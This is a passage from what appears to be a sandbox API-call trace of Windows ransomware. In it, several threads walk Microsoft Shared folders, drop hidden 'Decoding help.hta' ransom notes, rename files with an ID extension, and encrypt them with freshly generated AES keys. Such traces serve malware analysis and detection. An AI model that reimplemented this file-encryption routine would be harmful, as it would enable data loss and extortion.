files\\microsoft shared\\help\\1028\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9d4 [0058.027] WriteFile (in: hFile=0x9d4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1a41fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1a41fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.028] CloseHandle (hObject=0x9d4) returned 1 [0058.028] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.029] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hxdsui.dll") returned -1 [0058.029] lstrlenW (lpString="hxdsui.dll") returned 10 [0058.029] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\*.*" [0058.029] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\*.*") returned 70 [0058.029] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\", lpString2="hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll" [0058.029] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll" [0058.029] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.029] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1028\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1028\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.030] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1028\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9d4 [0058.030] CreateFileMappingA (hFile=0x9d4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x9d8 [0058.030] CryptAcquireContextA (in: phProv=0x1a41fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1a41fcec*=0x34489c8) returned 1 [0060.172] CryptGenKey (in: hProv=0x34489c8, Algid=0x6610, dwFlags=0x1, phKey=0x1a41fce8 | out: phKey=0x1a41fce8*=0x42cf118) returned 1 [0060.172] CryptExportKey (in: hKey=0x42cf118, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1a41fbe4, pdwDataLen=0x1a41fce4 | out: pbData=0x1a41fbe4*, pdwDataLen=0x1a41fce4*=0x2c) returned 1 [0060.172] MapViewOfFile (hFileMappingObject=0x9d8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3340) returned 0x2fe0000 [0062.860] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1a41fbe4*, pdwDataLen=0x1a41fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1a41fbe4*, pdwDataLen=0x1a41fcf8*=0x100) returned 1 [0062.863] CryptEncrypt (in: hKey=0x42cf118, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fe0000, pdwDataLen=0x1a41fce4*=0x3340, dwBufLen=0x3340 | out: pbData=0x2fe0000*, pdwDataLen=0x1a41fce4*=0x3340) returned 1 [0062.879] UnmapViewOfFile (lpBaseAddress=0x2fe0000) Thread: id = 701 os_tid = 0xf3c [0054.470] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\*.*", lpFindFileData=0x1a51fd30 | out: lpFindFileData=0x1a51fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567e4730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3130 [0060.428] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.428] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x1a51fd30 | out: lpFindFileData=0x1a51fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567e4730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.428] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.428] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.428] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x1a51fd30 | out: lpFindFileData=0x1a51fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x954c700, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x567e4730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x954c700, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xe743, dwReserved0=0x0, dwReserved1=0x0, cFileName="LAYERS.ELM", cAlternateFileName="")) returned 1 [0060.428] lstrcpyW (in: lpString1=0x115c1600, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\*.*" [0060.428] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\*.*") returned 70 [0060.428] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\Decoding help.hta" [0060.429] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\decoding help.hta")) returned 0xffffffff [0060.429] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa2c [0061.586] WriteFile (in: hFile=0xa2c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1a51fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1a51fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.586] CloseHandle (hObject=0xa2c) returned 1 [0061.587] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 702 os_tid = 0xf40 [0054.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US\\*.*", lpFindFileData=0x1a61fd30 | out: lpFindFileData=0x1a61fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db5f8 [0058.786] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.786] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x1a61fd30 | out: lpFindFileData=0x1a61fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.786] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.787] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.787] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x1a61fd30 | out: lpFindFileData=0x1a61fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0058.787] FindClose (in: hFindFile=0x5db5f8 | out: hFindFile=0x5db5f8) returned 1 Thread: id = 703 os_tid = 0xf44 [0054.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\*.*", lpFindFileData=0x1a71fd30 | out: lpFindFileData=0x1a71fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed5e6b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10f14680 [0058.659] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.659] FindNextFileW (in: hFindFile=0x10f14680, lpFindFileData=0x1a71fd30 | out: lpFindFileData=0x1a71fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed5e6b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.659] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.659] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.660] FindNextFileW (in: hFindFile=0x10f14680, lpFindFileData=0x1a71fd30 | out: lpFindFileData=0x1a71fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x538a200, ftCreationTime.dwHighDateTime=0x1c9db1a, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x538a200, ftLastWriteTime.dwHighDateTime=0x1c9db1a, nFileSizeHigh=0x0, nFileSizeLow=0x4f40, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxdsui.dll", cAlternateFileName="")) returned 1 [0058.660] lstrcpyW (in: lpString1=0x2515f9f0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\*.*" [0058.660] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\*.*") returned 70 [0058.660] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\Decoding help.hta" [0058.660] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1031\\decoding help.hta")) returned 0xffffffff [0058.660] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1031\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xcd4 [0058.660] WriteFile (in: hFile=0xcd4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1a71fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1a71fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.661] CloseHandle (hObject=0xcd4) returned 1 [0058.661] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.661] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hxdsui.dll") returned -1 [0058.661] lstrlenW (lpString="hxdsui.dll") returned 10 [0058.661] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\*.*" [0058.661] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\*.*") returned 70 [0058.662] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\", lpString2="hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll" [0058.662] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll" [0058.662] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.662] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1031\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1031\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.662] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1031\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xcd4 [0058.663] CreateFileMappingA (hFile=0xcd4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xcd8 [0058.663] CryptAcquireContextA (in: phProv=0x1a71fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1a71fcec*=0x10e27e88) returned 1 [0060.235] CryptGenKey (in: hProv=0x10e27e88, Algid=0x6610, dwFlags=0x1, phKey=0x1a71fce8 | out: phKey=0x1a71fce8*=0x10f146c0) returned 1 [0060.235] CryptExportKey (in: hKey=0x10f146c0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1a71fbe4, pdwDataLen=0x1a71fce4 | out: pbData=0x1a71fbe4*, pdwDataLen=0x1a71fce4*=0x2c) returned 1 [0060.235] MapViewOfFile (hFileMappingObject=0xcd8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4f40) returned 0x4d30000 Thread: id = 704 os_tid = 0xf48 [0054.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\*.*", lpFindFileData=0x1a81fd30 | out: lpFindFileData=0x1a81fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x66247150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbbf98 [0062.548] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.549] FindNextFileW (in: hFindFile=0x10fbbf98, lpFindFileData=0x1a81fd30 | out: lpFindFileData=0x1a81fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x66247150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.549] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.549] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.549] FindNextFileW (in: hFindFile=0x10fbbf98, lpFindFileData=0x1a81fd30 | out: lpFindFileData=0x1a81fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85f400, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa85f400, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xe2ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="LEVEL.ELM", cAlternateFileName="")) returned 1 Thread: id = 705 os_tid = 0xf4c [0054.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\*.*", lpFindFileData=0x1a91fd30 | out: lpFindFileData=0x1a91fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6e32460, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xd6e32460, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6e32460, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc5d8 [0058.882] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.882] FindNextFileW (in: hFindFile=0x10fbc5d8, lpFindFileData=0x1a91fd30 | out: lpFindFileData=0x1a91fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6e32460, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xd6e32460, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6e32460, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.883] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.883] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.883] FindNextFileW (in: hFindFile=0x10fbc5d8, lpFindFileData=0x1a91fd30 | out: lpFindFileData=0x1a91fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe422fc00, ftCreationTime.dwHighDateTime=0x1cb7000, ftLastAccessTime.dwLowDateTime=0xd6e585c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe422fc00, ftLastWriteTime.dwHighDateTime=0x1cb7000, nFileSizeHigh=0x0, nFileSizeLow=0x124ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wkconv.exe", cAlternateFileName="")) returned 1 [0058.883] lstrcpyW (in: lpString1=0x2515f9f0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\*.*" [0058.883] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\*.*") returned 77 [0058.883] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\Decoding help.hta" [0058.883] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wksconv\\decoding help.hta")) returned 0xffffffff [0058.883] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wksconv\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb90 [0060.492] WriteFile (in: hFile=0xb90, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1a91fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1a91fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.593] CloseHandle (hObject=0xb90) returned 1 [0061.593] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 706 os_tid = 0xf50 [0054.472] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\*.*", lpFindFileData=0x1aa1fd30 | out: lpFindFileData=0x1aa1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10f14700 [0058.663] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.664] FindNextFileW (in: hFindFile=0x10f14700, lpFindFileData=0x1aa1fd30 | out: lpFindFileData=0x1aa1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.664] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.664] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.664] FindNextFileW (in: hFindFile=0x10f14700, lpFindFileData=0x1aa1fd30 | out: lpFindFileData=0x1aa1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c6c3700, ftCreationTime.dwHighDateTime=0x1c9db16, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7c6c3700, ftLastWriteTime.dwHighDateTime=0x1c9db16, nFileSizeHigh=0x0, nFileSizeLow=0x4548, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxdsui.dll", cAlternateFileName="")) returned 1 [0058.664] lstrcpyW (in: lpString1=0x2515f9f0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\*.*" [0058.664] lstrlenW 